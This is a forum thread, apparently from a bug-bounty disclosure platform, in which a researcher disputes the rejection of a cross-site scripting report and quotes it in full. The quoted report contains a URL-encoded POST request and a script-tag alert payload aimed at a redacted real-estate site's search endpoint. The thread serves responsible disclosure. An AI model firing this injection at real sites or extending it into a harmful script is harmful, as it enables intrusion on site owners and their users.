632611
I have tried to submit this several times, but it keeps getting rejected. It is literally the simplest thing to reproduce, and I have included the steps to reproduce it. It would be very helpful to know why it is being rejected. Thanks.
Can't reproduce vulnerability
Re: Can't reproduce vulnerability
You forgot to provide PoC
Re: Can't reproduce vulnerability
I have the same. It would be helpful if we could be given a short reason why it was rejected.
Re: Can't reproduce vulnerability
Our report form has hints and examples, please read
Re: Can't reproduce vulnerability
Thank you for the curt response. None of the form fields or tool tips have any verbiage about "Proof of concept." I have read and re-read them all numerous times. The instructions I included in the report had the very simple steps listed to reproduce the exploit.
Other submissions have been approved, and they were submitted the same way.
Here is what I posted. Please let me know what is insufficient to prevent this problem from happening yet again:
I look forward to your response. Thanks.
-----------------------
Vulnerability Type: XSS
XSS URL: http://www.[REDACTED].com/idx/search-form/
POST Data: (x-www-form-urlencoded)
POST /property-search/sist_ajax/get_locations.asp
searchParameters=%7B%22searchTerm%22%3A%22%3Cscript%3Ealert(%5C%22OPENBUGBOUNTY%5C%22)%3C%2Fscript%3E%22%2C%22limit%22%3A10%2C%22siteId%22%3A%22376%22%2C%22mlsRegions%22%3A%2251%2C+25%2C+79%2C+103%22%2C%22facets%22%3A%5B%7B%22id%22%3A10%2C%22label%22%3A%22Address%22%2C%22example%22%3A%221234+Main+St%22%7D%2C%7B%22id%22%3A11%2C%22label%22%3A%22MLS+%23%22%2C%22example%22%3A%221234567%22%7D%5D%2C%22filters%22%3A%7B%22openHouses%22%3Afalse%2C%22status%22%3A%22Active%22%2C%22listTypes%22%3A%220%22%2C%22listTypeDescrip%22%3A%22%22%2C%22price%22%3A%7B%22min%22%3A-1%2C%22max%22%3A-1%7D%2C%22location%22%3A%7B%22id%22%3A-1%2C%22value%22%3A%22%22%7D%2C%22restrictLevel%22%3A1%2C%22restrictStatusLevel%22%3A0%7D%7D
Cookies: N/A
Application: Custom Code
Comment:
STEPS TO REPRODUCE:
In Chrome or Firefox:
1. Go to http://www.[REDACTED].com/idx/search-form/
2. Enter this into the "Quick Search by Address or MLS Number" search field:
<script>alert("OPENBUGBOUNTY")</script>
Press Enter/Return.
Re: Can't reproduce vulnerability
In report 632611 you forgot to provide POST data
willc wrote: ↑Tue Jun 19, 2018 12:04 pm
Thank you for the curt response. None of the form fields or tool tips have any verbiage about "Proof of concept." I have read and re-read them all numerous times. The instructions I included in the report had the very simple steps listed to reproduce the exploit.